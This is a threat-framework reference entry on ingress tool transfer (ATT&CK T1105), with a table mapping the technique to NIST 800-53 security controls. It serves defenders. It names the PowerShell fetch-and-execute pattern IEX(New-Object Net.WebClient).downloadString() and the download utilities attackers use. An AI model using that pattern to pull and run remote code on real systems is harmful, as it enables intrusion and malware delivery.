Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as copy, finger, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.(Citation: t1105_lolbas)
| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name |
|---|---|---|---|---|
| AC-4 | Information Flow Enforcement | Protects | T1105 | Ingress Tool Transfer |
| CA-7 | Continuous Monitoring | Protects | T1105 | Ingress Tool Transfer |
| CM-2 | Baseline Configuration | Protects | T1105 | Ingress Tool Transfer |
| CM-6 | Configuration Settings | Protects | T1105 | Ingress Tool Transfer |
| CM-7 | Least Functionality | Protects | T1105 | Ingress Tool Transfer |
| SC-7 | Boundary Protection | Protects | T1105 | Ingress Tool Transfer |
| SI-3 | Malicious Code Protection | Protects | T1105 | Ingress Tool Transfer |
| SI-4 | System Monitoring | Protects | T1105 | Ingress Tool Transfer |
| action.hacking.variety.Unknown | Unknown | related-to | T1105 | Ingress Tool Transfer |
| action.hacking.vector.Other network service | Network service that is not remote access or a web application. | related-to | T1105 | Ingress Tool Transfer |